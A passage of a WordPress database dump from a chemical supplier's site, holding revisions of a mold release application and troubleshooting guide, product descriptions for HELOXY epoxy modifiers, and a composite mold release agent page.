120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-07 14:26:54', '2016-11-07 14:26:54', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2924, 3, '2016-11-07 14:31:03', '2016-11-07 14:31:03', '', 'releasys-troubleshooting-guide', '', 'inherit', 'closed', 'closed', '', 'releasys-troubleshooting-guide', '', '', '2016-11-07 14:31:03', '2016-11-07 14:31:03', '', 2694, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/ReleaSys-Troubleshooting-Guide.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2925, 3, '2016-11-07 14:34:11', '2016-11-07 14:34:11', '', 'untitled-1', '', 'inherit', 'closed', 'closed', '', 'untitled-1', '', '', '2016-11-07 14:34:11', '2016-11-07 14:34:11', '', 2694, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/Untitled-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2926, 3, '2016-11-07 14:47:16', '2016-11-07 14:47:16', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong><span data-text-bg="primary">Complete failure to obtain release</span></strong></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ed1c24;">›</span> Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ed1c24;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ed1c24;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-07 14:47:16', '2016-11-07 14:47:16', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2927, 149, '2016-11-07 15:21:46', '2016-11-07 15:21:46', '', '', '', 'publish', 'closed', 'closed', '', '2927', '', '', '2016-11-07 15:21:46', '2016-11-07 15:21:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/2927/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2928, 151, '2016-11-07 19:13:50', '2016-11-07 19:13:50', '', '', '', 'publish', 'closed', 'closed', '', '2928', '', '', '2016-11-07 19:13:51', '2016-11-07 19:13:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/2928/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2929, 0, '2016-11-07 19:25:10', '2016-11-07 19:25:10', '', '', '', 'publish', 'closed', 'closed', '', '2929', '', '', '2016-11-07 19:25:11', '2016-11-07 19:25:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/2929/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2930, 3, '2016-11-07 20:18:41', '2016-11-07 20:18:41', 'HELOXY 61 is <span class="GramE">a commercial</span> grade butyl glycidyl ether. A low viscosity, virtually colorless monoepoxide, it is widely used in the viscosity reducing modification of epoxy resin formulations.\n\n<strong>Benefits</strong>\n<ul>\n 	<li>\n<div class="Section1">Most efficient epoxy resin viscosity reduction of all common epoxy functional modifiers</div></li>\n 	<li>\n<div class="Section1">Outstanding substrate and filler wetting characteristics</div></li>\n 	<li>\n<div class="Section1">Excellent retention of physical strength and thermal properties of base formulations</div></li>\n</ul>\n<strong>General Information</strong>\n\nThe relatively low molecular weight of HELOXY 61 makes it the most efficient common monoepoxide in reducing the viscosity of basic epoxy resin formulations. As with any monoepoxide, modification of basic epoxy resins with HELOXY 61 reduces the average functionality of the mixture thereby lowering overall cured state performance. However, due to its excellent viscosity reduction characteristics, relatively low levels of HELOXYModifiers are normally needed to attain desired viscosity reductions and these compromises in performance properties are held to a minimum. In any application, the amount of HELOXY 61 used in the formulation should be limited to that necessary to yield the required viscosity reduction. The maximum recommended quantity of  this Epoxy Functional Modifier is about 20 percent by weight of the resin portion.\n\nThis Epoxy Resin Modifier is compatible with other epoxy resins in all proportions and is easily blended with liquid resins at room temperature. If preferred, a pre-blend of HELOXY 61 and a standard bisphenol <span class="GramE">A</span> based liquid epoxy resin at a viscosity selected for easy handling is available as EPON™ Resin 815C. For information on properties and suggested uses of this resin, please consult the appropriate product literature.\n\nCuring agents that are recommended for unmodified basic liquid epoxy resins can also be used with compositions containing HELOXY 61. When calculating the proper stoichiometric amount of curing agent to be used with HELOXY 61 modified resins, differences in epoxy content of the resin resulting from this modification are small and can generally be ignored at modification levels below 10 parts per hundred <span class="GramE">resin</span> (phr).\n\nUnless excessive amounts of HELOXY 61 are used, the physical properties of the cured systems are not seriously affected at room temperature. However, physical and electrical properties at elevated temperatures may be reduced considerably\n\nMiller-Stephenson is an Epon, Epi Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'HELOXY™ 61', 'HELOXY™ Modifier 61 is a commercial grade butyl glycidyl ether. A low viscosity, virtually colorless monoepoxide, it is widely used in the viscosity reducing modification of epoxy resin formulations. The relatively low molecular weight of HELOXY 61 makes it the most efficient common monoepoxide in reducing the viscosity of basic epoxy resin formulations. However, due to its excellent viscosity reduction characteristics, relatively low levels of HELOXY 61 are normally needed to attain desired viscosity reductions and these compromises in performance properties are held to a minimum. Benefits include:\n<ul>\n 	<li>Most efficient epoxy resin viscosity reduction of all common epoxy functional modifiers</li>\n 	<li>Outstanding substrate and filler wetting characteristics</li>\n 	<li>Excellent retention of physical strength and thermal properties of base formulations</li>\n</ul>', 'inherit', 'closed', 'closed', '', '1069-autosave-v1', '', '', '2016-11-07 20:18:41', '2016-11-07 20:18:41', '', 1069, 'https://www.miller-stephenson.com/1069-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2931, 3, '2016-11-07 20:26:15', '2016-11-07 20:26:15', '<strong>Product Description- </strong>HELOXY 107 is the diglycidyl ether of cyclohexane dimethanol. While it is primarily used as a reactive diluent or viscosity reducing modifier for epoxy resin formulations, it also can effectively serve as a reactive intermediate for further synthesis of various cycloaliphatic based resins.\n\n<strong>Application Areas/Suggested Uses</strong>\n<ul>\n 	<li>\n<div class="Section1">To improve air release and wetting characteristics or to increase pot life in electrical, potting, encapsulation, and impregnation applications</div></li>\n 	<li>\n<div class="Section1">To maintain high reactivity yet provide workable viscosity at room temperature when using novolac or other high functionality epoxy resins</div></li>\n</ul>\n<strong>Benefits</strong>\n<ul>\n 	<li>Reduces viscosity of epoxy formulations while maintaining most cured state properties</li>\n 	<li>Provides excellent cured state resistance to creep or deformation under high stress</li>\n 	<li>Is an effective means of incorporating a cycloaliphatic structure into the polymer chain</li>\n</ul>\n<strong>General Information</strong>\n\nHELOXY 107 is fully compatible with the entire bisphenol <span class="GramE">A</span> based series of epoxy resins as well as higher functionality epoxy resins. Concentrations of up to 40 percent of HELOXY Modifier 107 have been employed for viscosity reduction. Performance properties of systems containing this resin are maintained at higher modifier concentrations than is possible with monoepoxide diluents and most diepoxide diluents.\n\nEffect of HELOXY 107 modifications on the properties of various EPON™ Resin 828 based systems is demonstrated by data presented in Table 1. Substituting HELOXY Modifier 107 for Epon Resin 828 or other unmodified resins generally results in slight increases in flexibility. As with all diluting modifiers, use of HELOXY Modifier 107 decreases chemical resistance and elevated temperature performance. To minimize such losses, the lowest concentration of HELOXY Modifier 107 necessary to obtain desired reduction in viscosity should be used.\n\nWhen formulating with HELOXY Modifier 107, the concentration of curing agent to be used will likely be different than in the case of an unmodified system. The proper curing agent combining ratio should always be calculated in order to ensure proper stoichiometric balance.', 'HELOXY™ 107', 'HELOXY™ Modifier 107 is the diglycidyl ether of cyclohexane dimethanol. While it is primarily used as a reactive diluent or viscosity reducing modifier for epoxy resin formulations, it also can effectively serve as a reactive intermediate for further synthesis of various cycloaliphatic based resins. Benefits include:\n<ul>\n 	<li>Reduces viscosity of epoxy formulations while maintaining most cured state properties</li>\n 	<li>Provides excellent cured state resistance to creep or deformation under high stress</li>\n 	<li>Effective means of incorporating a cycloaliphatic structure into the polymer chain</li>\n</ul>', 'inherit', 'closed', 'closed', '', '1227-autosave-v1', '', '', '2016-11-07 20:26:15', '2016-11-07 20:26:15', '', 1227, 'https://www.miller-stephenson.com/1227-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2932, 3, '2016-11-07 20:38:13', '2016-11-07 20:38:13', '<strong>Product Description-</strong> HELOXY 71 is an undiluted amber colored, low-viscosity liquid, aliphatic epoxy ester resin that imparts increased flexibility and resistance to thermal shock when blended with conventional liquid bisphenol A based epoxy resins.\n\nApplication Areas/Suggested Uses\n<ul>\n 	<li> Body solders</li>\n 	<li>Caulking and sealing compounds</li>\n 	<li>Electrical casting and encapsulating</li>\n 	<li>Glass to metal glazing compositions</li>\n 	<li>Large castings</li>\n 	<li>Tooling compositions</li>\n 	<li>Filament winding</li>\n</ul>\n<strong>Benefits </strong>\n<ul>\n 	<li>A low-viscosity flexibilizer that serves as a viscosity depressing agent.</li>\n 	<li>A product that improves impact strength and toughness to a conventional liquid bisphenol A epoxy resin.</li>\n</ul>\n<strong>Curing Agents </strong>\n\nBlends of HELOXY 71 and EPON™ Resin 828 can be cured with all curing agents except the polyamine adducts (i.e., EPIKURE™ Curing Agent 3282), which produce incompatible cured products. Depending upon the ratio of resin blend and the hardener used, the elongation at break can range as high as 200-300%, although 50-100% is more common. The use of HELOXY 71 as the sole resin in a formulation is not recommended. As in the case of most common flexibilizers, high concentrations of HELOXY Modifier 71 tend to decrease the superior chemical resistance of unmodified epoxy resin systems. Also, experience has shown that optimum tensile properties are normally reached with elevated temperature cures because there is a tendency for room temperature amine cured systems to age harden. Results obtained with various curing agent systems reported in the following sections are intended as a guide when selecting an EPON Resin 828/HELOXY Modifier 71/ EPIKURE Curing Agent system for your specific application.\n\n<strong>Cure with Aliphatic Amine Curing Agents</strong>\n\nBlends of HELOXY 71 and EPON Resin 828 cured with aliphatic amines yield a wide range of flexible to semi-rigid polymers. The final properties of these polymers are affected by the type of amine curing agent and the ratio of HELOXY Modifier 71 to EPON Resin 828. Although most of the data presented in this technical bulletin is based on systems cured at elevated temperatures, data is included which show that EPI-CURE Curing Agents 3223 and 3200 are effective room temperature curing agents.\n\n<strong>Cure with an Aromatic Diamine</strong>\n\nHELOXY Modifier 71 and EPON Resin 828 cured with ANCAMINE® Z (4,4\'- Methylenedianiline), an aromatic diamine, are summarized. You will note a wide range of tensile properties can be achieved depending on the ratio of EPON Resin 828 and HELOXY Modifier 71.\n\n<strong>Cure with Acid Anhydrides</strong>\n\nAs with amine curing agents, acid anhydrides can be used with HELOXY Modifier 71 or blends of this resin with EPON Resin 828 to produce tough, flexible polymers. Curing agent accelerators or catalysts, such as EPIKURE Curing Agent 3253 or benzyl dimethylamine (Aceto Corporation), are used to reduce the required HELOXY Modifier 71 HCD-2638 (Rev. 11/7/2016 3:28:44 PM) Page 2 of 7 cure time and cure temperature. Table 5 displays data on HELOXY Modifier 71 cured with two popular acid anhydrides. Table 6 displays tensile properties of several blends of HELOXY 71 and EPON Resin 828 cured with NADIC Methyl Anhydride. Again, you will note that adjusting the flexibilizer level in the EPON Resin 828 allows broad latitude in formulating a system with the desired tensile strength and elongation properties\n\n<strong>Cure with Lewis Acids or Accelerators</strong>\n\n75/25 by weight blend of HELOXY Modifier 71/ EPON Resin 828, cured with various levels of boron trifluoride monoethylamine. In this study, four parts of boron trifluoride monoethylamine appears to be the optimal level of Lewis acid. Another study was undertaken to determine the effect of phenolic accelerators on the properties of HELOXY Modifier 71 systems. Our laboratory determined that a formulator could add up to 5 parts of phenol per 100 parts of HELOXY 71 with no effect on tensile elongation. Higher levels of phenol decrease tensile strength and exhibit a deleterious effect on chemical resistance.', 'HELOXY™ 71', 'HELOXY™ Modifier 71 is an undiluted amber colored, low-viscosity liquid, aliphatic epoxy ester resin that imparts increased flexibility and resistance to thermal shock when blended with conventional liquid bisphenol A based epoxy resins. Benefits include:\n<ul>\n 	<li>A low-viscosity flexibilizer that serves as a viscosity depressing agent.</li>\n 	<li>A product that improves impact strength and toughness to a conventional liquid bisphenol A epoxy resin.</li>\n</ul>', 'inherit', 'closed', 'closed', '', '1230-autosave-v1', '', '', '2016-11-07 20:38:13', '2016-11-07 20:38:13', '', 1230, 'https://www.miller-stephenson.com/1230-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2933, 0, '2016-11-08 14:50:52', '2016-11-08 14:50:52', '', '', '', 'publish', 'closed', 'closed', '', '2933', '', '', '2016-11-08 14:50:52', '2016-11-08 14:50:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/2933/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2934, 0, '2016-11-08 15:27:59', '2016-11-08 15:27:59', '', '', '', 'publish', 'closed', 'closed', '', '2934', '', '', '2016-11-08 15:27:59', '2016-11-08 15:27:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/2934/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2935, 0, '2016-11-08 16:03:57', '2016-11-08 16:03:57', '', '', '', 'publish', 'closed', 'closed', '', '2935', '', '', '2016-11-08 16:03:57', '2016-11-08 16:03:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/2935/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2936, 3, '2016-11-08 17:50:45', '2016-11-08 17:50:45', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: 